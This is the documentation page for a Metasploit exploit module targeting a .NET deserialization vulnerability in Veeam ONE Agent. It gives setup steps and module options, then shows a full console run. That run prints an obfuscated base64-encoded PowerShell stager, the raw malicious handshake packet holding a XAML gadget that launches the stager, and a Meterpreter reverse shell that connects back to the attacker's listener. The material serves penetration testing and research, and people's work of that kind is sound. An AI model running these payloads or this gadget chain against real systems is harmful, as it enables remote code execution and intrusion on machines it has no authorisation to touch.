adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4e61596e7aff309bf20bbc8ee69f2c2ceda10037
metasploit-gs/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md
T
William Vu a6f7c0c0de Backport miscellaneous fixes to my modules
2020-08-14 13:40:23 -05:00

10 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits a .NET deserialization vulnerability in the Veeam ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the 9 and 10 release lines.

Specifically, the module targets the HandshakeResult() method used by the Agent. By inducing a failure in the handshake, the Agent will deserialize untrusted data.

Tested against the pre-patched release of 10.0.0.750. Note that Veeam continues to distribute this version but with the patch pre-applied.

Setup

  1. Download the pre-patched 10.0.0.750 ISO
  2. Mount the ISO in a 64-bit copy of Windows (I used Windows 10 x64)
  3. Run Setup.exe and follow the prompts to install the software

You can reference Veeam's quick start guide.

The service may take up to several minutes to start, even if you can connect to it, so please be patient.

Verification Steps

Follow Setup and Scenarios.

Targets

0

This executes a Windows command.

1

This uses a Windows dropper to execute code.

2

This uses a PowerShell stager to execute code.

Options

HOSTINFO_NAME

This is the name sent in the host info packet to the server. It must be recognized by the server. You shouldn't need to change this, but you may if your environment is different.

Scenarios

Veeam ONE Agent 10.0.0.750 on Windows 10 x64

msf5 > use exploit/windows/misc/veeam_one_agent_deserialization
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options

Module options (exploit/windows/misc/veeam_one_agent_deserialization):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   HOSTINFO_NAME  AgentController  yes       Name to send in host info (must be recognized by server!)
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          2805             yes       The target port (TCP)
   SRVHOST        0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT        8080             yes       The local port to listen on.
   SSL            false            no        Negotiate SSL for incoming connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                         no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150
rhosts => 172.16.249.150
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805
[*] 172.16.249.150:2805 - Sending host info to 172.16.249.150:2805
[+] 172.16.249.150:2805 - --> Host info packet: "\x05\x02\x0FAgentController"
[+] 172.16.249.150:2805 - <-- Host info reply: "\x03\x02\x00"
[*] 172.16.249.150:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] 172.16.249.150:2805 - Powershell command length: 2506
[*] 172.16.249.150:2805 - Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[*] 172.16.249.150:2805 - Sending malicious handshake to 172.16.249.150:2805
[+] 172.16.249.150:2805 - --> Handshake packet: "\x9E\f\x00\x00\a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00\f\x02\x00\x00\x00^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\x05\x01\x00\x00\x00BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\x01\x00\x00\x00\x0FForegroundBrush\x01\x02\x00\x00\x00\x06\x03\x00\x00\x00\xBC\x17<ResourceDictionary xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" xmlns:X=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns:S=\"clr-namespace:System;assembly=mscorlib\" xmlns:D=\"clr-namespace:System.Diagnostics;assembly=system\"><ObjectDataProvider X:Key=\"\" ObjectType=\"{X:Type D:Process}\" MethodName=\"Start\"><ObjectDataProvider.MethodParameters><S:String>cmd</S:String><S:String>/c powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>\v"
[+] 172.16.249.150:2805 - <-- Handshake reply: "\x00\x00\x00\x00\xBA\xB0\x8DJ\xA2A\eL\x9E\xD3r\xB4w\xD3\xEFn\x0E\x00\x00\x00\a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00"
[*] Sending stage (201283 bytes) to 172.16.249.150
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:49725) at 2020-04-28 01:06:47 -0500

meterpreter > getuid
Server username: WINDEV2004EVAL\User
meterpreter > sysinfo
Computer        : WINDEV2004EVAL
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 21
Meterpreter     : x64/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink